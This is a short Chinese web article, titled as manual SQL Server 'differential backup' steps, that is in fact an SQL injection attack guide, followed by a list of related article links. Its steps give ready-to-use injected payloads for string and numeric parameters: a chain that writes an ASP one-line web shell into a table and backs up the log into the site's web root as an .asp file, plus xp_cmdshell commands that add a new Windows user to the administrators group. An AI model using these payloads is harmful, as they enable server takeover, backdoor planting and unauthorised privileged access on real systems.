sqlserver 手工实现差异备份的步骤

 更新时间:2011年04月01日 00:54:54   作者:  
sqlserver 手工实现差异备份的步骤,需要的朋友可以参考下。

手工实现差异备份的步骤

字符型:

1、恢复当前库
;alter database 当前库 set RECOVERY FULL--

2、建表cmd
;create table cmd (a image)--

3、备份当前库到D:\cmd1
;backup log 当前库 to disk = 'D:\cmd1' with init--

4、插入一句话代码到创建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')-- 

5、备份一句话代码到站点根目录
;backup log 当前库 to disk = 'D:\www_web\oct.asp'--

6、完成
;drop table 创建的表--

数字型

1、恢复当前库
';alter database 当前库 set RECOVERY FULL--

2、创建表cmd
';create table cmd (a image)--

3、备份当前库到D:\cmd1
';backup log 当前库 to disk = 'D:\cmd1' with init--

4、插入一句话代码到创建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')-- 

5、备份一句话代码到站点根目录
';backup log 当前库 to disk = 'D:\www_web\oct.asp'--

6、完成
';drop table 创建的表--

sa权限创建管理员用户

1、判断是否有注入;and 1=1 ;and 1=2 
;and user_name()='dbo' 判断当前系统的连接用户是不是sa

2、添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--

逍遥复仇:有工具我是一定不会手工的,麻烦。

相关文章

  • SqlServer存储过程实现及拼接sql的注意点

    SqlServer存储过程实现及拼接sql的注意点

    这篇文章主要介绍了SqlServer存储过程实现及拼接sql的注意点的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
    2016-07-07
  • SQLServer 游标的创建和使用基本步骤

    SQLServer 游标的创建和使用基本步骤

    游标主要用于存储过程、触发器或T-SQL脚本中,当需要遍历查询结果集中的每一行数据并进行操作时,游标就显得非常有用,本文给大家介绍SQLServer 游标的创建和使用基本步骤,感兴趣的朋友一起看看吧
    2024-08-08
  • SQL Server的存储过程详解

    SQL Server的存储过程详解

    这篇文章主要为大家介绍了SQLServer的存储过程,具有一定的参考价值,感兴趣的小伙伴们可以参考一下,希望能够给你带来帮助
    2022-01-01
  • sql语句中单引号嵌套问题(一定要避免直接嵌套)

    sql语句中单引号嵌套问题(一定要避免直接嵌套)

    直接嵌套肯定是不行的,java中用反斜杠做转义符也是不行的,在sql中是用单引号来做转义符的
    2014-09-09
  • SQL Server使用SELECT INTO实现表备份的代码示例

    SQL Server使用SELECT INTO实现表备份的代码示例

    在数据库管理过程中,有时我们需要对表进行备份,以防数据丢失或修改错误,在 SQL Server 中,可以使用 SELECT INTO 语句将数据从一个表备份到另一个表,本文通过代码示例介绍的非常详细,需要的朋友可以参考下
    2025-01-01
  • sqlserver:查询锁住sql以及解锁方法

    sqlserver:查询锁住sql以及解锁方法

    这篇文章主要介绍了sqlserver:查询锁住sql以及解锁方法,具有一定参考价值,这里分享给大家,供需要的朋友参考。
    2017-10-10
  • sql中的常用的字符串处理函数大全

    sql中的常用的字符串处理函数大全

    这篇文章主要介绍了sql中的常用的字符串处理函数,非常不错,具有一定的参考借鉴价值,需要的朋友可以参考下
    2018-09-09
  • SQLSERVER的版本信息和SP补丁信息查看方法

    SQLSERVER的版本信息和SP补丁信息查看方法

    打开SQLSERVER配置管理器,然后用鼠标左键双击打开属性对话框,然后选择高级选项卡就可以看到SQL的版本信息,有需要的朋友可以了解下啊,或许对你有所帮助
    2013-01-01
  • SQL SERVER临时表排序问题的解决方法

    SQL SERVER临时表排序问题的解决方法

    这篇文章主要给大家介绍了关于SQL SERVER临时表排序问题的解决方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2021-01-01
  • 解析关于SQL语句Count的一点细节

    解析关于SQL语句Count的一点细节

    本篇文章是对关于SQL语句Count的一点细节进行了详细的分析介绍,需要的朋友参考下
    2013-06-06

最新评论